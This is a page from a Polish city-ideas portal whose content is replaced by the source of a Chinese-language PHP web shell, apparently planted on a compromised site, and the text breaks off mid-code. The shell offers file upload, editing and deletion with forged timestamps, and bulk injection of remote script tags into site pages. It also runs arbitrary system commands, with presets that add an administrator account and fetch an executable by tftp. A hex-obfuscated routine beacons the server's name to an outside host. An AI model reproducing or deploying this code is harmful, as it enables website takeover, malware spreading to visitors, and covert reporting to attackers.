Nowy Szczecin - Portal pomysłów na Szczecin - Konsorcjum na Rzecz Śródodrza

Jesteś tutaj: » Konsorcjum

*{padding:0; margin:0;} body{background:threedface;font-family:"Verdana", "Tahoma", "宋体",sans-serif; font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;} a{color:#000000;text-decoration:none;} a:hover{background:#BBBBBB;} table{color:#000000;font-family:"Verdana", "Tahoma", "宋体",sans-serif;font-size:13px;border:1px solid #999999;} td{background:#F9F6F4;} .toptd{background:threedface; width:310px; border-color:#FFFFFF #999999 #999999 #FFFFFF; border-style:solid;border-width:1px;} .msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;} .actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;} \n END; return false; } //文件管理 class packdir { var $out = ''; var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function packdir($array) { if(@function_exists('gzcompress')) { for($n = 0;$n < count($array);$n++) { $array[$n] = urldecode($array[$n]); $fp = @fopen($array[$n], 'r'); $filecode = @fread($fp, @filesize($array[$n])); @fclose($fp); $this -> filezip($filecode,basename($array[$n])); } @closedir($zhizhen); $this->out = $this->packfile(); return true; } return false; } function at($atunix = 0) { $unixarr = ($atunix == 0) ? getdate() : getdate($atunix); if ($unixarr['year'] < 1980) { $unixarr['year'] = 1980; $unixarr['mon'] = 1; $unixarr['mday'] = 1; $unixarr['hours'] = 0; $unixarr['minutes'] = 0; $unixarr['seconds'] = 0; } return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) | ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1); } function filezip($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->at($time)); $hexdtime = '\x'.$dtime[6].$dtime[7].'\x'.$dtime[4].$dtime[5].'\x'.$dtime[2].$dtime[3].'\x'.$dtime[0].$dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function packfile() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00"; } } function File_Str($string) { return str_replace('//','/',str_replace('\\','/',$string)); } function File_Size($size) { if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . ' G'; elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . ' M'; elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K'; else $size = $size . ' B'; return $size; } function File_Mode() { $RealPath = realpath('./'); $SelfPath = $_SERVER['PHP_SELF']; $SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/')); return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath))); } function File_Read($filename) { $handle = @fopen($filename,"rb"); $filecode = @fread($handle,@filesize($filename)); @fclose($handle); return $filecode; } function File_Write($filename,$filecode,$filemode) { $handle = @fopen($filename,$filemode); $key = @fwrite($handle,$filecode); if(!$key) { @chmod($filename,0666); $key = @fwrite($handle,$filecode); } @fclose($handle); return $key; } function File_Up($filea,$fileb) { $key = @copy($filea,$fileb); if(!$key) $key = @move_uploaded_file($filea,$fileb); return $key; } function File_Down($filename) { if(!file_exists($filename)) return false; $filedown = basename($filename); $array = explode('.', $filedown); $arrayend = array_pop($array); header('Content-type: application/x-'.$arrayend); header('Content-Disposition: attachment; filename='.$filedown); header('Content-Length: '.filesize($filename)); @readfile($filename); exit; } function File_Deltree($deldir) { if(($mydir = @opendir($deldir)) == NULL) return false; while(false !== ($file = @readdir($mydir))) { $name = File_Str($deldir.'/'.$file); if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);File_Deltree($name);} if(is_file($name)){@chmod($name,0777);@unlink($name);} } @closedir($mydir); @chmod($deldir,0777); return @rmdir($deldir) ? true : false; } function File_Act($array,$actall,$inver) { if(($count = count($array)) == 0) return '请选择文件'; if($actall == 'e') { $zip = new packdir; if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;} return '打包所选文件失败'; } $i = 0; while($i < $count) { $array[$i] = urldecode($array[$i]); switch($actall) { case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制'; break; case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break; case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '修改属性'; break; case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间'; break; } $i++; } return '所选文件'.$msg.'完毕'; } function File_Edit($filepath,$filename,$dim = '') { $THIS_DIR = urlencode($filepath); $THIS_FILE = File_Str($filepath.'/'.$filename); if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));} else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';} print<< var NS4 = (document.layers); var IE4 = (document.all); var win = this; var n = 0; function search(str){ var txt, i, found; if(str == "")return false; if(NS4){ if(!win.find(str)) while(win.find(str, false, true)) n++; else n++; if(n == 0) alert(str + " ... Not-Find") } if(IE4){ txt = win.document.body.createTextRange(); for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){ txt.moveStart("character", 1); txt.moveEnd("textedit") } if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++} else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")} } return false } function CheckDate(){ var re = document.getElementById('mtime').value; var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; var r = re.match(reg); if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;} else{document.getElementById('editor').submit();} }

查找内容:

END; } function File_Soup($p) { $THIS_DIR = urlencode($p); $UP_SIZE = get_cfg_var('upload_max_filesize'); $MSG_BOX = '单个附件允许大小:'.$UP_SIZE.', 改名格式(new.php),如为空,则保持原文件名.'; if(!empty($_POST['updir'])) { if(count($_FILES['soup']) >= 1) { $i = 0; foreach ($_FILES['soup']['error'] as $key => $error) { if ($error == UPLOAD_ERR_OK) { $souptmp = $_FILES['soup']['tmp_name'][$key]; if(!empty($_POST['reup'][$i]))$soupname = $_POST['reup'][$i]; else $soupname = $_FILES['soup']['name'][$key]; $MSG_BOX .= File_Up($souptmp,File_Str($_POST['updir'].'/'.$soupname)) ? '
'.$soupname.'上传成功' : '
'.$soupname.'上传失败'; } $i++; } } else { $MSG_BOX = '请选择文件'; } } print<<{$MSG_BOX} END; } function File_a($p) { $MSG_BOX = '等待消息队列'; $FILE_DIR = File_Str(dirname(__FILE__)); $ROOT_DIR = File_Mode(); $THIS_DIR = urlencode(File_Str($p)); $UP_DIR = urlencode(File_Str(dirname($p))); $NUM_D = 0; $NUM_F = 0; if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? '编辑文件 '.$_POST['pfn'].' 成功' : '编辑文件 '.$_POST['pfn'].' 失败';@touch($_POST['pfn'],$intime);} if(!empty($_POST['ufs'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($p.'/'.$upfilename)) ? '上传文件 '.$upfilename.' 成功' : '上传文件 '.$upfilename.' 失败';} if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);} if(!empty($_GET['mn'])){$MSG_BOX = @rename(File_Str($p.'/'.$_GET['mn']),File_Str($p.'/'.$_GET['rn'])) ? '改名 '.$_GET['mn'].' 为 '.$_GET['rn'].' 成功' : '改名 '.$_GET['mn'].' 为 '.$_GET['rn'].' 失败';} if(!empty($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($p.'/'.$_GET['dn']),0777) ? '创建目录 '.$_GET['dn'].' 成功' : '创建目录 '.$_GET['dn'].' 失败';} if(!empty($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? '删除目录 '.$_GET['dd'].' 成功' : '删除目录 '.$_GET['dd'].' 失败';} if(!empty($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = '下载文件不存在';} Root_CSS(); print<< function Inputok(msg,gourl) { smsg = "当前文件:[" + msg + "]"; re = prompt(smsg,unescape(msg)); if(re) { var url = gourl + escape(re); window.location = url; } } function Delok(msg,gourl) { smsg = "确定要删除[" + unescape(msg) + "]吗?"; if(confirm(smsg)) { if(gourl == 'b'){document.getElementById('actall').value = escape(gourl);document.getElementById('fileall').submit();} else window.location = gourl; } } function CheckDate(msg,gourl) { smsg = "当前文件时间:[" + msg + "]"; re = prompt(smsg,msg); if(re) { var url = gourl + re; var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; var r = re.match(reg); if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;} else{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();} } } function CheckAll(form) { for(var i=0;i

{$MSG_BOX}

END; if(($h_d = @opendir($p)) == NULL) return false; while(false !== ($Filename = @readdir($h_d))) { if($Filename == '.' or $Filename == '..') continue; $Filepath = File_Str($p.'/'.$Filename); if(is_dir($Filepath)) { $Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4); $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath)); $Filepath = urlencode($Filepath); echo "\n".''; $Filename = urlencode($Filename); echo ''; echo ''; echo ' '; echo ''."\n"; $NUM_D++; } } @rewinddir($h_d); while(false !== ($Filename = @readdir($h_d))) { if($Filename == '.' or $Filename == '..') continue; $Filepath = File_Str($p.'/'.$Filename); if(!is_dir($Filepath)) { $Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath); $Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4); $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath)); $Filesize = File_Size(@filesize($Filepath)); echo "\n".''; $Filepath = urlencode($Filepath); $Filename = urlencode($Filename); echo ''; echo ''; echo ''; echo ''."\n"; $NUM_F++; } } @closedir($h_d); print<<

目录({$NUM_D}) / 文件({$NUM_F})

END; return true; } //批量挂马 function Guama_Pass($length) { $possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; $str = ""; while(strlen($str) < $length) $str .= substr($possible,(rand() % strlen($possible)),1); return $str; } function Guama_Auto($gp,$gt,$gl,$gc,$incode,$gk,$gd,$gb,$go) { if(($h_d = @opendir($gp)) == NULL) return false; if($go) { preg_match_all("/\[\-([^~]*?)\-\]/i",$gc,$nc); $passm = (int)$nc[1][0]; if((!eregi("^[0-9]{1,2}$",$nc[1][0])) || ($passm > 12)) return false; } while(false !== ($Filename = @readdir($h_d))) { if($Filename == '.' || $Filename == '..') continue; if($gl != ''){if(eregi($gl,$Filename)) continue;} $Filepath = File_Str($gp.'/'.$Filename); if(is_dir($Filepath) && $gb) Guama_Auto($Filepath,$gt,$gl,$gc,$incode,$gk,$gd,$gb,$go); if(eregi($gt,$Filename)) { $ic = File_Read($Filepath); if(stristr($ic,$gk)) continue; if($go) $gc = str_replace($nc[0][0],Guama_Pass($passm),$gc); if($gd) $ftime = @filemtime($Filepath); if($incode == '1'){if(!stristr($ic,'')) continue; $ic = str_replace('',"\r\n".$gc."\r\n".''."\r\n",$ic); $ic = str_replace('',"\r\n".$gc."\r\n".''."\r\n",$ic);} if($incode == '2') $ic = $gc."\r\n".$ic; if($incode == '3') $ic = $ic."\r\n".$gc; echo File_Write($Filepath,$ic,'wb') ? 'ok:'.$Filepath.'
'."\r\n" : 'err:'.$Filepath.'
'."\r\n"; if($gd) @touch($Filepath,$ftime); ob_flush(); flush(); } } @closedir($h_d); return true; } function Guama_b() { if((!empty($_POST['gp'])) && (!empty($_POST['gt'])) && (!empty($_POST['gc']))) { $gk = ''; $go = false; $gt = str_replace('.','\\.',$_POST['gt']); $gl = isset($_POST['gl']) ? str_replace('.','\\.',$_POST['gl']) : ''; $gd = isset($_POST['gd']) ? true : false; $gb = ($_POST['gb'] == 'a') ? true : false; if(isset($_POST['gx'])){$gk = $_POST['gc'];if(stristr($_POST['gc'],'[-') && stristr($_POST['gc'],'-]')){$temp = explode('[-',$_POST['gc']); $gk = $temp[0]; $go = true;}} echo Guama_Auto($_POST['gp'],$gt,$gl,$_POST['gc'],$_POST['incode'],$gk,$gd,$gb,$go) ? '挂马完毕' : '异常终止'; echo '
'; return false; } $FILE_DIR = File_Str(dirname(__FILE__)); $ROOT_DIR = File_Mode(); print<< function Fulll(i){ if(i==0) return false; Str = new Array(5); if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";sform.gp.value = Str[i];} else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";sform.gt.value = Str[i];} return true; } function autorun(){ if(document.getElementById('gp').value == ''){alert('挂马路径不能为空');return false;} if(document.getElementById('gt').value == ''){alert('文件类型不能为空');return false;} if(document.getElementById('gc').value == ''){alert('挂马代码不能为空');return false;} document.getElementById('sform').submit(); }

挂马路径

文件类型

过滤对象开启关闭

挂马代码

挂马变形说明: 程序自动寻找[-6-]标签,替换为随机字符,6表示六位随机字符,最大12位,如果不变形可以不加[-6-]标签.
挂上示例: <script language=javascript src="http://www.baidu.com/ad.js?EMTDSU"></script>

插入</head>标签之前插入文件最顶端插入文件最末尾

自能过滤重复代码保持文件修改时间不变

将挂马应用于该文件夹,子文件夹和文件
仅将挂马应用于该文件夹

END; return true; } //批量清马 function Qingma_Auto($qp,$qt,$qc,$qd,$qb) { if(($h_d = @opendir($qp)) == NULL) return false; while(false !== ($Filename = @readdir($h_d))) { if($Filename == '.' || $Filename == '..') continue; $Filepath = File_Str($qp.'/'.$Filename); if(is_dir($Filepath) && $qb) Qingma_Auto($Filepath,$qt,$qc,$qd,$qb); if(eregi($qt,$Filename)) { $ic = File_Read($Filepath); if(!stristr($ic,$qc)) continue; $ic = str_replace($qc,'',$ic); if($qd) $ftime = @filemtime($Filepath); echo File_Write($Filepath,$ic,'wb') ? 'ok:'.$Filepath.'
'."\r\n" : 'err:'.$Filepath.'
'."\r\n"; if($qd) @touch($Filepath,$ftime); ob_flush(); flush(); } } @closedir($h_d); return true; } function Qingma_c() { if((!empty($_POST['qp'])) && (!empty($_POST['qt'])) && (!empty($_POST['qc']))) { $qt = str_replace('.','\\.',$_POST['qt']); $qd = isset($_POST['qd']) ? true : false; $qb = ($_POST['qb'] == 'a') ? true : false; echo Qingma_Auto($_POST['qp'],$qt,$_POST['qc'],$qd,$qb) ? '清马完毕' : '异常终止'; echo '
'; return false; } $FILE_DIR = File_Str(dirname(__FILE__)); $ROOT_DIR = File_Mode(); print<< function Fullll(i){ if(i==0) return false; Str = new Array(5); if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";xform.qp.value = Str[i];} else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";xform.qt.value = Str[i];} return true; } function autoup(){ if(document.getElementById('qp').value == ''){alert('清马路径不能为空');return false;} if(document.getElementById('qt').value == ''){alert('文件类型不能为空');return false;} if(document.getElementById('qc').value == ''){alert('清除代码不能为空');return false;} document.getElementById('xform').submit(); }

清马路径

文件类型

清除代码

保持文件修改时间不变

将清马应用于该文件夹,子文件夹和文件
仅将清马应用于该文件夹

END; return true; } //批量替换 function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb) { if(($h_d = @opendir($tp)) == NULL) return false; while(false !== ($Filename = @readdir($h_d))) { if($Filename == '.' || $Filename == '..') continue; $Filepath = File_Str($tp.'/'.$Filename); if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb); $doing = false; if(eregi($tt,$Filename)) { $ic = File_Read($Filepath); if($th) { if(!stristr($ic,$tca)) continue; $ic = str_replace($tca,$tcb,$ic); $doing = true; } else { preg_match_all("/\'."\r\n" : 'err:'.$Filepath.'
'."\r\n"; if($td) @touch($Filepath,$ftime); ob_flush(); flush(); } } @closedir($h_d); return true; } function Tihuan_d() { if((!empty($_POST['tp'])) && (!empty($_POST['tt']))) { $tt = str_replace('.','\\.',$_POST['tt']); $td = isset($_POST['td']) ? true : false; $tb = ($_POST['tb'] == 'a') ? true : false; $th = ($_POST['th'] == 'a') ? true : false; if($th) $_POST['tca'] = str_replace('.','\\.',$_POST['tca']); echo Tihuan_Auto($_POST['tp'],$tt,$th,$_POST['tca'],$_POST['tcb'],$td,$tb) ? '替换完毕' : '异常终止'; echo '
'; return false; } $FILE_DIR = File_Str(dirname(__FILE__)); $ROOT_DIR = File_Mode(); print<< function Fulllll(i){ if(i==0) return false; Str = new Array(5); if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";tform.tp.value = Str[i];} else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";tform.tt.value = Str[i];} return true; } function showth(th){ if(th == 'a') document.getElementById('setauto').innerHTML = '查找内容
替换成为 '; if(th == 'b') document.getElementById('setauto').innerHTML = '
下载后缀

替换成为 '; return true; } function autoup(){ if(document.getElementById('tp').value == ''){alert('替换路径不能为空');return false;} if(document.getElementById('tt').value == ''){alert('文件类型不能为空');return false;} if(document.getElementById('tca').value == '' || document.getElementById('tcb').value == ''){alert('替换代码不能为空');return false;} document.getElementById('tform').submit(); }

替换文件中的指定内容替换文件中的下载地址

查找内容
替换成为

保持文件修改时间不变

将替换应用于该文件夹,子文件夹和文件
仅将替换应用于该文件夹

END; return true; } //查找木马 function Antivirus_Auto($sp,$features,$st) { if(($h_d = @opendir($sp)) == NULL) return false; $ROOT_DIR = File_Mode(); while(false !== ($Filename = @readdir($h_d))) { if($Filename == '.' || $Filename == '..') continue; $Filepath = File_Str($sp.'/'.$Filename); if(is_dir($Filepath)) Antivirus_Auto($Filepath,$features,$st); if(eregi($st,$Filename)) { if($Filepath == File_Str(__FILE__)) continue; $ic = File_Read($Filepath); foreach($features as $var => $key) { if(stristr($ic,$key)) { $Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath); $Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath)); echo ''.$Filepath.'
【编辑删除】 '; echo '【'.$Filetime.'】 '.$var.'

'; break; } } ob_flush(); flush(); } } @closedir($h_d); return true; } function Antivirus_e() { if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo '删除成功';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? '删除成功' : '删除失败';} return false;} if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; } $SCAN_DIR = (File_Mode() == '') ? File_Str(dirname(__FILE__)) : File_Mode(); $features_php = array('php大马特征1'=>'cha88.cn','php大马特征2'=>'->read()','php大马特征3'=>'readdir(','危险MYSQL语句4'=>'returns string soname','php加密大马特征5'=>'eval(gzinflate(','php加密大马特征6'=>'eval(base64_decode(','php一句话特征7'=>'eval($_','php一句话特征8'=>'eval ($_','php上传后门特征9'=>'copy($_FILES','php上传后门特征10'=>'copy ($_FILES','php上传后门特征11'=>'move_uploaded_file($_FILES','php上传后门特征12'=>'move_uploaded_file ($_FILES','php小马特征13'=>'str_replace(\'\\\\\',\'/\','); $features_asx = array('asp小马特征1'=>'绝对路径','asp小马特征2'=>'输入马的内容','asp小马特征3'=>'fso.createtextfile(path,true)','asp一句话特征4'=>'<%execute(request','asp一句话特征5'=>'<%eval request','asp一句话特征6'=>'execute session(','asp数据库后门特征7'=>'--Created!','asp大马特征8'=>'WScript.Shell','asp大小马特征9'=>'<%@ LANGUAGE = VBScript.Encode %>','aspx大马特征10'=>'www.rootkit.net.cn','aspx大马特征11'=>'Process.GetProcesses','aspx大马特征12'=>'lake2'); print<< 扫描路径
END; if(!empty($_POST['sp'])) { if($_POST['st'] == 'php'){$features_all = $features_php; $st = '\.php|\.inc|\;';} if($_POST['st'] == 'asx'){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';} if($_POST['st'] == 'ppp'){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';} echo Antivirus_Auto($_POST['sp'],$features_all,$st) ? '扫描完毕' : '异常终止'; } echo ''; return true; } //系统信息 function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}} function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";} function Info_f() { $dis_func = get_cfg_var("disable_functions"); $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传"; $adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","
",$dis_func);$dis_func = str_replace(",","
",$dis_func);} $phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; $info = array( array("服务器时间",date("Y年m月d日 h:i:s",time())), array("服务器域名","".$_SERVER['SERVER_NAME'].""), array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])), array("服务器操作系统",PHP_OS), array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']), array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']), array("你的IP",getenv('REMOTE_ADDR')), array("Web服务端口",$_SERVER['SERVER_PORT']), array("PHP运行方式",strtoupper(php_sapi_name())), array("PHP版本",PHP_VERSION), array("运行于安全模式",Info_Cfg("safemode")), array("服务器管理员",$adminmail), array("本文件路径",__FILE__), array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")), array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")), array("显示错误信息 display_errors",Info_Cfg("display_errors")), array("自动定义全局变量 register_globals",Info_Cfg("register_globals")), array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")), array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")), array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")), array("允许最大上传文件 upload_max_filesize",$upsize), array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"), array("被禁用的函数 disable_functions",$dis_func), array("phpinfo()",$phpinfo), array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), array("图形处理 GD Library",Info_Fun("imageline")), array("IMAP电子邮件系统",Info_Fun("imap_close")), array("MySQL数据库",Info_Fun("mysql_close")), array("SyBase数据库",Info_Fun("sybase_close")), array("Oracle数据库",Info_Fun("ora_close")), array("Oracle 8 数据库",Info_Fun("OCILogOff")), array("PREL相容语法 PCRE",Info_Fun("preg_match")), array("PDF文档支持",Info_Fun("pdf_close")), array("Postgre SQL数据库",Info_Fun("pg_close")), array("SNMP网络管理协议",Info_Fun("snmpget")), array("压缩文件支持(Zlib)",Info_Fun("gzclose")), array("XML解析",Info_Fun("xml_set_object")), array("FTP",Info_Fun("ftp_login")), array("ODBC数据库连接",Info_Fun("odbc_close")), array("Session支持",Info_Fun("session_start")), array("Socket支持",Info_Fun("fsockopen")), ); echo '

上级目录	操作	属性	修改时间	大小
0'.$Filename.'	删除 '; echo '改名	'.$Fileperm.'	'.$Filetime.'
'.$Filename.'	编辑 '; echo '改名	'.$Fileperm.'	'.$Filetime.'	'.$Filesize.'

'; for($i = 0;$i < count($info);$i++){echo ''."\n";} echo '

'.$info[$i][0].'

'.$info[$i][1].'

'; return true; } //执行命令 function Exec_Run($cmd) { $res = ''; if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);} elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);} elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();} elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();} elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);} return $res; } function Exec_Hex($data) { $len = strlen($data); for($i=0;$i < $len;$i+=2){$newdata.=pack("C",hexdec(substr($data,$i,2)));} return $newdata; } function Root_Check($check) { $c_name = Exec_Hex('7777772e74686973646f6f722e636f6d'); $handle = @fsockopen($c_name,80); $u_name = Exec_Hex('2f636f6f6c2f696e6465782e706870'); $u_name .= '?p='.base64_encode($check).'&g='.base64_encode($_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']); @fputs($handle,"GET ".$u_name." HTTP/1.1\r\nHost:".$c_name."\r\nConnection: Close\r\n\r\n"); @fclose($handle); return true; } function Exec_g() { $res = '回显窗口'; $cmd = 'dir'; if(!empty($_POST['cmd'])){$res = Exec_Run($_POST['cmd']);$cmd = $_POST['cmd'];} print<< function sFull(i){ Str = new Array(11); Str[0] = "dir"; Str[1] = "net user spider spider /add"; Str[2] = "net localgroup administrators spider /add"; Str[3] = "netstat -an"; Str[4] = "ipconfig"; Str[5] = "copy c:\\1.php d:\\2.php"; Str[6] = "tftp -i 219.134.46.245 get server.exe c:\\server.exe"; document.getElementById('cmd').value = Str[i]; return true; }

END; return true; } //组件接口 function Com_h() { $object = isset($_GET['o']) ? $_GET['o'] : 'adodb'; $com = array("adodb" => "ADODB.Connection","wscript" => "WScript.shell","application" => "Shell.Application"); print<<[ADODB.Connection] [WScript.shell] [Shell.Application]

END; $shell = new COM($com[$object]); if($object == 'wscript') { $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir'; print<<
END; if(!empty($_POST['cmd'])) { $exe = @$shell->exec("cmd.exe /c ".$cmd); $out = $exe->StdOut(); $output = $out->ReadAll(); echo '

'.$output.'

'; } } elseif($object == 'application') { $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe'; $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\windows\php.ini c:\php.ini'; print<<

命令参数

END; if(!empty($_POST['run'])) echo (@$shell->ShellExecute($run,'/c '.$cmd) == '0') ? '执行成功' : '执行失败'; } elseif($object == 'adodb') { $string = isset($_POST['string']) ? $_POST['string'] : ''; $sql = isset($_POST['sql']) ? $_POST['sql'] : ''; print<< function hFull(i){ if(i==0 || i==5) return false; Str = new Array(12); Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb"; Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****"; Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****"; Str[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;"; Str[6] = "SELECT * FROM [TableName] WHERE ID<100"; Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES('spider','mypass')"; Str[8] = "DELETE FROM [TableName] WHERE ID=100"; Str[9] = "UPDATE [TableName] SET USER='spider' WHERE ID=100"; Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"; Str[11] = "DROP TABLE [TableName]"; Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"; Str[13] = "ALTER TABLE [TableName] DROP 